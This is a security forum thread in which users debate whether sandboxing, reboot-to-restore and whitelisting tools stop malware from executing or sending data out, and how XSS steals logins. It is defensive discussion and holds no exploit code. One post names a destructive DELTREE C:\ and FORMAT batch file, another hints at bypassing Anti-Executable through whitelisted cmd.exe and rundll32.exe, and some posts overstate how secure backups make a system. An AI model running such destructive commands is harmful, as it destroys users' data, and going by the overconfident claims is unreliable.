AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk.
So these security softwares keep your harddisk clean, because they prevent installation and this is the best kind of protection, because if an infection installs itself, you have a much bigger problem, you have to detect and remove it in time, before it can execute its evil job.

Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)

-{ Quote: "AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk.
So these security softwares keep your harddisk clean, because they prevent installation and this is the best kind of protection, because if an infection installs itself, you have a much bigger problem, you have to detect and remove it in time, before it can execute its evil job.

Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)" }-


Have no illusions about that,we live in the world off anti/anti/anti/anti missiles so to speak,and one day everything get hosed,its the game off bad smart guys against good smart guys,and there is no winner !!

-{ Quote: "Have no illusions about that,we live in the world off anti/anti/anti/anti missiles so to speak,and one day everything get hosed,its the game off bad smart guys against good smart guys,and there is no winner !!" }-
In other words these softwares don't do a full job and can't be trusted either. That's what I thought too, not only regarding virtualization, but also the rest of security softwares.

That's why I replace my system partition with a new one during each reboot, because I can't depend on security softwares, too many holes.

-{ Quote: "Have no illusions about that,we live in the world off anti/anti/anti/anti missiles so to speak,and one day everything get hosed,its the game off bad smart guys against good smart guys,and there is no winner !!" }-

Again i beg to differ with a defeatist attitude. Yes many will say it's fact and only a matter of time but they been completely absent from the scene of security meetings such as these longer than most to subscribe to such a notion.

If the facts truly be known, the WINNER!! as they say is really YOU! or US!

"IF" you have ALL the right pieces (programs) in place AND/OR Duplicates of your system/drive onto METAL hd's.........you've already 100% completely and without remedy, defeated the best efforts/purposes of even the most cleverest/sharpest Windows coder of intrusion or distraction programs on the face of the earth.

I've said it many times before and will say again for clarity right here and now. Up and untill that very day that some exploit developer or Team of them can ever effectively hijack the very electric current that flows into these electronics reaching our computer machines, their efforts are limited at best to only the uninformed and unlearned user/business.

Theres really no illusion to this at all, nor wishful thinking, it only takes a sincerely determined and concerted effort on the well informed end user's part to totally secure their data AND machine from ever being compromised aside from it being physically removed off it's premises. All too simple.

-{ Quote: "Again i beg to differ with a defeatist attitude. Yes many will say it's fact and only a matter of time but they been completely absent from the scene of security meetings such as these longer than most to subscribe to such a notion.

If the facts truly be known, the WINNER!! as they say is really YOU! or US!

"IF" you have ALL the right pieces (programs) in place AND/OR Duplicates of your system/drive onto METAL hd's.........you've already 100% completely and without remedy, defeated the best efforts/purposes of even the most cleverest/sharpest Windows coder of intrusion or distraction programs on the face of the earth.

I've said it many times before and will say again for clarity right here and now. Up and untill that very day that some exploit developer or Team of them can ever effectively hijack the very electric current that flows into these electronics reaching our computer machines, their efforts are limited at best to only the uninformed and unlearned user/business.

Theres really no illusion to this at all, nor wishful thinking, it only takes a sincerely determined and concerted effort on the well informed end user's part to totally secure their data AND machine from ever being compromised aside from it being physically removed off it's premises. All too simple." }-


Hey Easter 2010,as example you place great confidence in power shadow,and one off the clever coders abandoned the company and joins the ranks of the bad guys,he knows exactly how to compromise the stuff,and in no time your blessed virti is not virtiual at all,dont forget it's all about money',no ethics involved,we live in a greedy world so the cyberworld is no exeption !!

Well, I still don't have a straight answer to my question.

Is an isolated infection able to do its evil job or not, in case the virtualization software isn't compromised yet ?

I don't see the installation as a problem, because I can remove the installation. So that problem is already taken care of.

I see the execution as a serious problem, because once it's done, I can't undo the execution.

If there is no other protection in place, malware can do whatever its programmed to do once executed in a virtual environment.

-{ Quote: "Hey Easter 2010,as example you place great confidence in power shadow,and one off the clever coders abandoned the company and joins the ranks of the bad guys,he knows exactly how to compromise the stuff,and in no time your blessed virti is not virtiual at all,dont forget it's all about money',no ethics involved,we live in a greedy world so the cyberworld is no exeption !!" }-

Hey Huupi, no matter at all. Power Shadow is but a single program and if you read these forums regularly you should know by now EVERYONE uses a Layered Approach anyway. It's the safest way to go don't ya' know.

Besides, i got FD-ISR snapshots plus a Library of ARCHIVES so what?

And even then, i keep "Perfectly Clean & Intact" IMAGES of my entire drives/partition stored in my closet. ;D

So no matter, and POWER SHADOW still works PERFECT!

There is then now & therefore no more fear EVER of contempt or compromise to my system, ;D either forced attempts from outside interests or self inflicted because FirstDefense keeps my archives in the exact order as when they were created. ;D

IF i ever need to return my active system to some prior state, it's accomplished in record time as in seconds!!

Please no discussion about compromised security softwares, ALL security softwares can be compromised without exception and it has been proven. Image Backup solves such problem and the owner of the software will fix it too.
That's why Windows and other softwares have so many patches. :)

-{ Quote: "If there is no other protection in place, malware can do whatever its programmed to do once executed in a virtual environment." }-
Finally one answer. Thanks for your opinion. I still think that Anti-Executable and DefenseWall do a better job than virtualization softwares, because they stop the execution.

-{ Quote: "AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk.
So these security softwares keep your harddisk clean, because they prevent installation and this is the best kind of protection, because if an infection installs itself, you have a much bigger problem, you have to detect and remove it in time, before it can execute its evil job.

Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible. :)" }-
The infections can still execute and deliver their payload, but their effects are limited to the virtualized environment. If a malware executes inside a sandbox quarantined by SandboxIE, the effects will be gone when you delete the sandbox. If a malware executes when you are in Shadow Mode using PowerShadow, whatever the malware does will be reversed after a reboot. In no way, barring bugs in the virtualization software, will malware be able to effect any changes outside the virtualized environment.

-{ Quote: "The infections can still execute and deliver their payload, but their effects are limited to the virtualized environment. If a malware executes inside a sandbox quarantined by SandboxIE, the effects will be gone when you delete the sandbox. If a malware executes when you are in Shadow Mode using PowerShadow, whatever the malware does will be reversed after a reboot. In no way, barring bugs in the virtualization software, will malware be able to effect any changes outside the virtualized environment." }-
Is an isolated malware able to send info to the thief over the internet ?

-{ Quote: "I still think that Anti-Executable and DefenseWall do a better job than virtualization softwares, because they stop the execution." }-

Good point Erik because whatever material (files/programs) are prevented from "FULL" entry in the first place the same has nowhere to lodge let alone communicate with your ($M's buggy) system, which enforces my support of HIPS all the more because they COMPLETELY SUSPEND! interaction before any damage or change can even happen.

Something To Note:

This regards executables alone no matter the file extension $M designed in them to double the same as an executable file, any of them. Because whatever we view on the screen absolutely MUST enter our file system (Temporary Internet Files) or there would be nothing to see or read.

-{ Quote: "which enforces my support of HIPS all the more because they COMPLETELY SUSPEND! interaction before any damage or change can even happen." }-
On condition that users know how to make decisions in HIPS, which is a problem for most average users.

-{ Quote: "Something To Note:
This regards executables alone no matter the file extension $M designed in them to double the same as an executable file, any of them. Because whatever we view on the screen absolutely MUST enter our file system (Temporary Internet Files) or there would be nothing to see or read." }-
I can't translate this very well in Dutch. So I don't really understand this.

-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
If not intercepted by a firewall then malware can send whatever to wherever.
IMO sandboxing's main use is to isolate any possible infections. Virtualization's main use is to allow the user to do whatever they like without fear of corrupting their working base system.

-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
Unfortunately, yes. This is one point where virtualization will fail you, because they only stop changes from being done to the local computer.

Wouldn't your firewall throw up an outbound alert?

How long before a suit offers AV, AS, FW, HIPS and virtualization.

True and true again as both replied above.

Virtualizing is more adept to FLUSHING like you do your toilet after use. Simple analogy but you get the point.

That's the reason for "resident" antispyware & antivirus programs etc. They work to identify (if they can) something registered as malicious and potentially harmful.

Hi ErikAlbert,

I will have a go to translate this for you:

Something To Note:
This regards executables alone no matter the file extension $M designed in them to double the same as an executable file, any of them. Because whatever we view on the screen absolutely MUST enter our file system (Temporary Internet Files) or there would be nothing to see or read.

Het is goed om voor elk uitvoerbaar bestand (maakt niet welke extensie Microsoft er aan heeft gegeven) dezelfde dubbele voorzorgsmaatregelen te nemen. Ik denk dat dubbele slaat op Anti-Executable + DefenseWall (of wel alleen programma laten starten na expliciete bevestiging van de gebruiker met beperkte rechten voor bestanden die van onbetrouwbare bronnen af komen).

Tenslotte wordt alles dat we op ons beeldscherm zien eerst op onze computer gezet (bijvoorbeeld de tijdelijke Internetbestanden) of geladen (in geheugen).

Groet Kees

-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-

that's one of the main reasons Erik that I still depend on scanners (AV/AT/AS) because between reboots malware can do it's tricks ... (the way you have your setup I mean) ...

I guess the main reason for stopping this is having Anti-Executable? Am I right?

but there is far more nasty out there then *.exe, ...

that's why your setup has a serious vulnerability imho ...

But I have no illusions about mine either ... mine is filled with wholes as big as XP en Vista ;) ...

-{ Quote: "that's one of the main reasons Erik that I still depend on scanners (AV/AT/AS) because between reboots malware can do it's tricks ... (the way you have your setup I mean) ...

I guess the main reason for stopping this is having Anti-Executable? Am I right?

but there is far more nasty out there then *.exe, ...

that's why your setup has a serious vulnerability imho ...

But I have no illusions about mine either ... mine is filled with wholes as big as XP en Vista ;) ..." }-
As far as I can tell, Anti-Executable stops more than .exe files. However, I have no idea if it only looks at the extension or checks the mimetype as well - if it's the former, I can certainly think of a way or two to possibly get past it...

If used in tandem with virtualization software or a good HIPS, a firewall will eliminate the need for things such as scanners or Anti-Executable. A good firewall should always be part of your security setup anyway.

-{ Quote: "As far as I can tell, Anti-Executable stops more than .exe files. However, I have no idea if it only looks at the extension or checks the mimetype as well - if it's the former, I can certainly think of a way or two to possibly get past it...

If used in tandem with virtualization software or a good HIPS, a firewall will eliminate the need for things such as scanners or Anti-Executable. A good firewall should always be part of your security setup anyway." }-
Anti-Executable recognizes more than 80 executables and each executable has a quintuple verification : File Size, File Type, File Location, Creation Date and Code Sample.
That's a pretty strong protection to stop installation and execution of malicious executables. Anything what doesn't fit is simply refused by Anti-Executable.

-{ Quote: "As far as I can tell, Anti-Executable stops more than .exe files. However, I have no idea if it only looks at the extension or checks the mimetype as well - if it's the former, I can certainly think of a way or two to possibly get past it..." }-

indeed, that's what I was thinking too.

it's like you said ... a firewall should stop (and LnS does) / fix a lot of nasty stuff.

take care,

-{ Quote: "that's one of the main reasons Erik that I still depend on scanners (AV/AT/AS) because between reboots malware can do it's tricks ... (the way you have your setup I mean) ...
" }-
Well, I have a problem with trusting scanners, but I guess you must know this already. My security is mainly based on whitelists and stopping execution. After reboot I have my unchanged system partition back anyway.

-{ Quote: "Hi ErikAlbert,
Het is goed om voor elk uitvoerbaar bestand (maakt niet welke extensie Microsoft er aan heeft gegeven) dezelfde dubbele voorzorgsmaatregelen te nemen. Ik denk dat dubbele slaat op Anti-Executable + DefenseWall (of wel alleen programma laten starten na expliciete bevestiging van de gebruiker met beperkte rechten voor bestanden die van onbetrouwbare bronnen af komen).

Tenslotte wordt alles dat we op ons beeldscherm zien eerst op onze computer gezet (bijvoorbeeld de tijdelijke Internetbestanden) of geladen (in geheugen).

Groet Kees" }-
Thanks alot Kees. 8)

-{ Quote: "Anti-Executable recognizes more than 80 executables and each executable has a quintuple verification : File Size, File Type, File Location, Creation Date and Code Sample.
That's a pretty strong protection to stop installation and execution of malicious executables. Anything what doesn't fit is simply refused by Anti-Executable." }-
Depends. If it doesn't check mimetypes, and if it whitelists rundll32.exe or cmd.exe by default, then everything's game.

Though I personally doubt that. ;D

Someone recently took me to task over my choice and recommending ScriptSentry, but right there and possibly most of all is been the perfect launching/spreading method of viruses for a long time on Windows systems.

Vbs files, batch, and other files that use $M's scripting host have been responsible for plenty of malicious and damaging actions carried out either remotely or from an email link ETC. and they still can be used exactly the same as an .exe. I use them all the time to automate different purposes on my machine since you can even set a schedule when their due to activate.

ScriptSentry always worked just like a HIPS in that it associates itself "FIRST!" with those executable file extensions and stops them cold before they can take off and do any damage.

SandboxIE, you set it to block read of important folders. Those folders will not be read by anything sandboxed. Rootkits will not be installed. Only the lightweight keyloggers (Tzuk has a name for those, "Windows Message Key-Loggers"; "Typically this key-logger will be a secret Web browser plugin").

Put it this way: i'm pretty sure malware doesn't do anything. With VM's, it's even more extreme, since whatever malware exists in VM, already thinks it's riding a computer, not two.

-{ Quote: "Depends. If it doesn't check mimetypes, and if it whitelists rundll32.exe or cmd.exe by default, then everything's game.

Though I personally doubt that. ;D" }-
Well, I still have my reboot that replaces my system partition completely with a new one, because I don't trust any of my security softwares.

-{ Quote: "ALL security softwares can be compromised without exception and it has been proven." }-Correction... "ALL security softwares can be compromised without exception and it has been proven."

How can you be 100% sure the software you use for your off-line snap is 100% good... do you always buy CDs, and never download from the Internet?

To me, there is no such thing as "security software", the software is either good or bad/flawed. "Security software" gives a false sense of real security.

Mike

-{ Quote: "Correction... "ALL security softwares can be compromised without exception and it has been proven."

How can you be 100% sure the software you use for your off-line snap is 100% good... do you always buy CDs, and never download from the Internet?

To me, there is no such thing as "security software", the software is either good or bad/flawed. "Security software" gives a false sense of real security.

Mike" }-
I'm never sure about anything in life, but I like to get close to the best solution, I can get. Everybody has downloaded software, I'm no exception.
I prefer to use whitelists, rather than blacklists to keep my computer clean, which is alot better and more reassuring, than the scanner message "Congrats, no malware found."
Keep your scanners, I have something much better. :)

-{ Quote: "Is an isolated malware able to send info to the thief over the internet ?" }-
-{ Quote: "ScriptSentry always worked just like a HIPS in that it associates itself "FIRST!" with those executable file extensions and stops them cold before they can take off and do any damage." }-

Hello Erik and Easter,

Unfortunately, programs like ScriptSentry must read the file from disk, and are no protection against scripts on a web site that are interpreted by the browser - javascript being the main culprit.

This is true of XSS attacks which use javascript, where even in a virtualized environment, info can indeed be sent to the thief over the internet.

The problem is that most secure sites require javascript to be enabled.

See here (http://www.wilderssecurity.com/showthread.php?t=174415) for an example, and feel free to suggest preventative measures.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

I guess malware is also XSS atacks, they are scripts, sorry for not including a current threat.

-{ Quote: "Unfortunately, programs like ScriptSentry must read the file from disk, and are no protection against scripts on a web site that are interpreted by the browser - javascript being the main culprit." }-

Worth pointing out and of course true.

From that viewpoint, I'm not sure if an argument for Opera or Mozilla etc. would be of any real benefit but it's little consolation for the massses who depend solely on IE browser now is it?

What does a script do to your system partition ?

-{ Quote: "What does a script do to your system partition ?" }-

If your script-blocking software supports it, NOTHING AT ALL.

-{ Quote: "If your script-blocking software supports it, NOTHING AT ALL." }-
That wasn't my question.

Sorry i don't know Dutch, i didn't completely understand what answer you're looking for.

That's why I usually run with Javascript turned off if I can get away with it. However, what about the code that can flash your bios? Does it need a reboot to do so? What about updating firmware with code? For those things that may be stuck on my computer during a reboot I have AVAST Antivirus for that as it has a preboot AV scanner that scans the whole system the way I tell it to to block code from infecting during a boot up. Avast also has a built in anti-executable feature that you can program with many various types of extensions. Comodo has a feature on it's firewall to prevent outgoing signals during a bootup process as well. That is my main concern is the booting process so I want my nasties GONE before I have to boot. That is why I chose powershadow. FDISR 's frozen snapshot ends up trying to erase something AFTER the boot. You can't erase a bios flash.

-{ Quote: "What does a script do to your system partition ?" }-What a script does on the HD is of no consequence if you have a reboot-to-restore solution.

But the point I was making referred to your question about sending info out during the session. These kinds of attacks are not interested in changing anything on your partition, rather, stealing data during the session, prior to your reboot.

This is in answer to the topic of your thread:

-{ Quote: "Although the infections are isolated, my question is still, can these infections still do their evil job or NOT ?
Isolation is nice, but only nice when the execution is also impossible." }-If you consider an XSS attack as an "infection" - temporary for sure, then the answer is Yes.

Whether or not you are in a virtualized environment doesn't matter, as long as the browser has free access in<--->out on the internet.

@ Easter: It doesn't matter which browser. If javascript is enabled because the site needs it, the script gets interpreted.

To understand how this works, see the XSS threads in the 'Other Security Topics' forum.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "@ Easter: It doesn't matter which browser. If javascript is enabled because the site needs it, the script gets interpreted.

To understand how this works, see the XSS threads in the 'Other Security Topics' forum.

regards,

-rich" }-

Thanks for those details and explainations. I think every $M O/S should have some form of script-blocking security in place for the just-in-case scenario.
BTW, just speculating with this but i think the term scripting here has to do with that ALL scripts are basic TEXT files incognito. Correct me if this is not accurate, i tend to not enjoy putting my foot in my mouth to often where it concerns $M style of different coding techniques. LoL

-{ Quote: "If it doesn't check mimetypes, and if it whitelists rundll32.exe or cmd.exe by default, then everything's game." }-
I suggest you to read Rmus' analysis of Anti-Executable (http://www.urs2.net/rsj/computing/tests/Anti-Exec/index.html). Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. But, I'm not smart enough to figure a way to pass commands to those files without running another executable which isn't allowed by AE.
-{ Quote: "What does a script do to your system partition ?" }-
A script can do whatever it wants (i.e., wipe your hard disk). However, scripts are treated as executable by Anti-Executable, so they aren't a problem for you.

Answering your original question: Virtualization/sandboxes doesn't protect against keyloggers/password stealers. But, there are solutions to this issue:
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information.
- Harden the security of the browser (NoScript, whitelist cookies, control of referers, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS, spoofing, etc)

-{ Quote: "I suggest you to read Rmus' analysis of Anti-Executable (http://www.urs2.net/rsj/computing/tests/Anti-Exec/index.html). Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. But, I'm not smart enough to figure a way to pass commands to those files without running another executable which isn't allowed by AE.

A script can do whatever it wants (i.e., wipe your hard disk). However, scripts are treated as executable by Anti-Executable, so they aren't a problem for you.

Answering your original question: Virtualization/sandboxes doesn't protect against keyloggers/password stealers. But, there are solutions to this issue:
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information.
- Harden the security of the browser (NoScript, whitelist cookies, control of referers, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS, spoofing, etc)" }-
Thank you guys. It seems to me that AE isn't such a bad choice after all.
My main goal is stopping the execution of infections, which is the worst part of any infection.
DefenseWall treats Firefox and MSIE as untrusted applications, which means they can't do much either.
Emails aren't a problem, I ignore and delete them without opening them.

-{ Quote: "Well, I still have my reboot that replaces my system partition completely with a new one, because I don't trust any of my security softwares." }-

Just add scriptsentry or scriptdefender. Next add the one of your choice to the untrusted programs within DefenseWall. Now all scripts are marked untrusted and limited in rights. Maybe this helps you to gain trust (at least in your rock solid defense combo) and get connected (for instance by e-mail) in the digital world.

Regards K

-{ Quote: "DefenseWall treats Firefox and MSIE as untrusted applications, which means they can't do much either." }-
Untrusted means that a file downloaded/created by FF/MSIE can't modify system settings, write to the registry, install drivers/hooks/services, read/write from/to physical memory, etc.
You're still exposed to browser-based scripting attacks. Anti-Executable only protects you against WSH-based (http://en.wikipedia.org/wiki/Windows_Script_Host) scripts.
As a general rule, when you're going to do bank transactions/online shopping, start a new/fresh browser session.

-{ Quote: "Hello Erik and Easter,

Unfortunately, programs like ScriptSentry must read the file from disk, and are no protection against scripts on a web site that are interpreted by the browser - javascript being the main culprit.

This is true of XSS attacks which use javascript, where even in a virtualized environment, info can indeed be sent to the thief over the internet.

The problem is that most secure sites require javascript to be enabled.

See here (http://www.wilderssecurity.com/showthread.php?t=174415) for an example, and feel free to suggest preventative measures.

regards,

-rich

" }-


When using a policy right virtualization program like GeSwall or Defense Wall, just quit all untrusted processes first before starting sensitive internet sessions (like Lucas1985 advised).

This is more or less a work around not a direct conunter measure

Regards K

-{ Quote: "
You're still exposed to browser-based scripting attacks. " }-
Even when Java and JavaScript is disabled in Firefox ?

-{ Quote: "I suggest you to read Rmus' analysis of Anti-Executable (http://www.urs2.net/rsj/computing/tests/Anti-Exec/index.html). Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. But, I'm not smart enough to figure a way to pass commands to those files without running another executable which isn't allowed by AE." }-
After reading that article, I actually think I'm already halfway to bypassing AE. Unless something I suspect and the article doesn't describe is false. ;D

-{ Quote: "Thanks for those details and explainations. I think every $M O/S should have some form of script-blocking security in place for the just-in-case scenario." }-This, of course, is an immense problem: in the case of web-embedded javascript - that is, code in the HTML source code of the web page - how do you determine good from bad? Anti-virus solutions for recognizing "bad code" in the case of that used in cross site scripting (XSS) have not proven reliable, since the code can be easily modified.

-{ Quote: "BTW, just speculating with this but i think the term scripting here has to do with that ALL scripts are basic TEXT files incognito" }-Yes, for example, as soon as the HTML page for any web site caches to your HD, it essentially is a text (non-formatted) file. When you go to View|Source in your browser, you are opening the web page in a text editor and you will see that it is a plain text file.

Do this experiment: clear your browser cache, then go to a web site and observe what caches. I'll do this now using IE to cache Wilders (IE is nice because it retains the original file names) - see screenshot

If these files weren't cached, you could not see anything on your monitor.

Now, why didn't your ScriptSentry keep those .js files from running? Because the browser interprets them: they are not "executed" on the HD like a normal file would be.

You can configure the browser to not run them, of course, but the problem is some sites (including Wilders) require javascript for certain functions to run. We trust Wilders not to run malicious scripts, so we don't worry about it.

Now, double-click-to-run one of the .js files and your ScriptSentry will intercept it because Windows, rather than the browser, interprets the .js file extension and sends it to ScriptSentry according to the HKCR command in the Registry for the .js filetype:


[HKEY_CLASSES_ROOT\JSFile\Shell\Open\Command]
@="C:\\Program Files\\Script Sentry\\ScriptSentry.exe \"%1\" %*"
Understanding the difference in how file extensions are interpreted - whether by the browser or the OS - is imperative in order to understand what secutity solutions are necessary in each case. For example, you may not want a .pdf file on the web to open in the browser; so, you can configure the browser to pass the .pdf file extension directly to the OS to open in your default Reader program, thus preventing the appended-URL exploit from a while back. You can configure the browser to pass web-based *.doc files to a text editor, rather than to MSWord, for obvious reasons.

Now, open-to-edit the .js file in a text editor and you will see that it is a plain text file.

As an aside, one of the most innovative programs I've ever seen is WormGuard. Rather than associate all script extensions to block, as is the method with ScriptSentry and similar, it analyzes the scripts with several different types of "engines" and alerts when it recognizes malicous code in the script.

This approach eventually may be a solution that can be used to analyze (scan) web-based scripts.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Even when Java and JavaScript is disabled in Firefox ?" }-
Completely disabled or using a whitelist like NoScript?
-{ Quote: "After reading that article, I actually think I'm already halfway to bypassing AE. Unless something I suspect and the article doesn't describe is false. ;D" }-
Please, share with us your findings/thoughts.
-{ Quote: "As an aside, one of the most innovative programs I've ever seen is WormGuard. Rather than associate all script extensions to block, as is the method with ScriptSentry and similar, it analyzes the scripts with several different types of "engines" and alerts when it recognizes malicous code in the script.

This approach eventually may be a solution that can be used to analyze (scan) web-based scripts." }-
Does WormGuard analyze browser-based scripts? :o :o I've learned something new. However, WG's solution is behavioral/heuristic based, so it may fail (unlike whitelists).

-{ Quote: "However, scripts are treated as executable by Anti-Executable, so they aren't a problem for you." }--{ Quote: " Anti-Executable only protects you against WSH-based (http://en.wikipedia.org/wiki/Windows_Script_Host) scripts." }-There is a slight misconception here.

Both file extensions .exe and .vbs are "executable" in that they run code. However, for convenience, a distinction is made between .exe (executable) and .vbs (script).

Anti-Executable does not protect against script-types: .js, .vbs, etc.

Anti-Executable's job is to create a White List of all .exe-type executable file types: .exe, .dll, .sys, .ocx, etc. Any file of this executable type will not be allowed to download/install/run if not on the White List.

Script-type executables must be dealt with according to whether the file (using .js is an example) is already on the HD and attempts to execute by some means; or, embedded in a web page, as I've described above.

Lucas, WormGuard does not analyze web-based scripts. I suggested that it's approach might be integrated with some type of web-scanning solution. We'll have to see :)

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "As a general rule, when you're going to do bank transactions/online shopping, start a new/fresh browser session." }-Please read the XSS threads in the other security forum. This is a completely different problem, and none of the solutions discussed here in this thread will work.

So, go over there and have a look and give it some thought, because it requires a totally different approach and analysis.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "
Both file extensions .exe and .vbs are "executable" in that they run code. However, for convenience, a distinction is made between .exe (executable) and .vbs (script)." }-
I know that ;) I just didn't want to explode Erik's head ;D
-{ Quote: "Anti-Executable does not protect against script-types: .js, .vbs, etc.

Anti-Executable's job is to create a White List of all .exe-type executable file types: .exe, .dll, .sys, .ocx, etc. Any file of this executable type will not be allowed to download/install/run if not on the White List.." }-
Well, I'm confused now :blink: I thought that AE intercepts WSH scripts. So, ScriptDefender/ScriptSentry aren't redundant add-ons to AE.
-{ Quote: "Lucas, WormGuard does not analyze web-based scripts. I suggested that it's approach might be integrated with some type of web-scanning solution. We'll have to see :) " }-
Have you tested WG against malware/PoC?
:thumb:

-{ Quote: " Yes, AE whitelists rundll32.exe and cmd.exe and I see this as a possible hole. " }-Only if a malicious program is either already installed before you let AE create the White List, or if it installed while you had AE disabled. In both cases, the malicious program could use those two you mention to carry out attacks.

AE is not a behavior blocker. It has one simple function: while enabled, to guard the door against any executable not on its White List;

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

Strange but still disturbing fact nonetheless that you bring up here, but not so long as you apply script security which acts as a go-between for .vbs,.bat,.js,.reg, so forth and so on with script extensions.

These potentially dangerous files can be easily overlooked and in many instances have been discounted in the past AND present but nothing is more threatening as these scripts can be to a system.

I once clicked a single .bat file purely by accident that was so coded that when i hit the shut off button to stop it thought i had prevented a catastrophy since it was HardDrive Killer program i got off a virus site. Unbeknowns untill i actually read the code later, the worse thing i did was reboot because it proceeded to complete the DELTREE C:\ FORMAT job completely and quickly :blink:

-{ Quote: "Well, I'm confused now :blink: I thought that AE intercepts WSH scripts. So, ScriptDefender/ScriptSentry aren't redundant add-ons to AE." }-No, not at all.

-{ Quote: "Have you tested WG against malware/PoC?" }-See here:

http://www.wilderssecurity.com/showpost.php?p=521885&postcount=7

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Please read the XSS threads in the other security forum. This is a completely different problem, and none of the solutions discussed here in this thread will work." }-
Please, read this post (http://www.wilderssecurity.com/showpost.php?p=1002556&postcount=42):
-{ Quote: "Virtualization/sandboxes doesn't protect against keyloggers/password stealers. But, there are solutions to this issue:
Against keyloggers. Keylogger executes inside the sandbox but it can't grab data
- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information.
Against XSS
- Harden the security of the browser (NoScript, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS, spoofing, etc)" }-

-{ Quote: "
See here:

http://www.wilderssecurity.com/showpost.php?p=521885&postcount=7" }-
Thanks ;)
Unfortunately, DiamondCS seems to be in the twilight.

-{ Quote: "Please, read this post (http://www.wilderssecurity.com/showpost.php?p=1002556&postcount=42):" }-I'm not sure what your point is.

In the XSS exploit, where the login page has been compromised, the user enters her/his ID and Password to log in to the page. When the user clicks "Submit" that information is sent out to the hacker.

Nothing discussed here will prevent that.

If you have a solution, please go to my XSS thread and present it :)

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

Here is a good example of the problem with web-embedded scripts.

I can click elio's link in the ZA XSS thread to open his XSS exploit demo page, and the browser happily obliges.

However, if I d-click the cached .html file, WormGuard snags it because it has been able to read the file from disk:

http://www.urs2.net/rsj/computing/imgs/wg-example.gif

The file with a questionable script has to be already on the HD for a script-blocking program to work.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "I'm not sure what your point is." }-
I'm suggesting that against browser-based attacks, the countermeasures are:
- NoScript (anti-XSS features).
- Whitelisted HTTP/S traffic (your approach).
-{ Quote: "The file with a questionable script has to be already on the HD for a script-blocking program to work." }-
You're right. A possible solution would be integrating WG's engine into a broswer plug-in. Firekeeper (http://firekeeper.mozdev.org/index.html) could be that solution.

-{ Quote: "I'm suggesting that against browser-based attacks, the countermeasures are:
- NoScript (anti-XSS features)." }-The problem here is that you could not log in to your account with javascript disabled. (assuming your log in page uses javascript)

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "- NoScript (anti-XSS features)." }-

This is what makes Wilder's so very valuable for us, the generosity in sharing results either from real-world experiences or even articles.

Thanks for the mention of No-Script, i have to consider it and will likely test it myself.

Anti-XSS features are for whitelisted sites ;) Whitelisted sites can execute Javascript.
Firekeeper (discussion between developers of Adblock Plus and NoScript) (http://www.wilderssecurity.com/showthread.php?t=168176)
Link (http://www.wilderssecurity.com/showpost.php?p=963722&postcount=35)
-{ Quote: "NoScript can't currently protect you against XSS attacks targeted to a whitelisted site." }-
-{ Quote: "If the compromised site is not on your whitelist, XSS attacks will fail.
That said, I'm also actively developing and testing prevention measures for notable XSS vectors, and I'll progressively implement them into NoScript." }-

-{ Quote: "Anti-XSS features are for whitelisted sites ;) Whitelisted sites can execute Javascript." }-Sorry, Lucas, I completely forgot about NoScript :-[

Here is another link to follow:

http://www.castlecops.com/p930581-NoScript_1_1_4_8_is_out.html

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Sorry, Lucas, I completely forgot about NoScript :-[ " }-
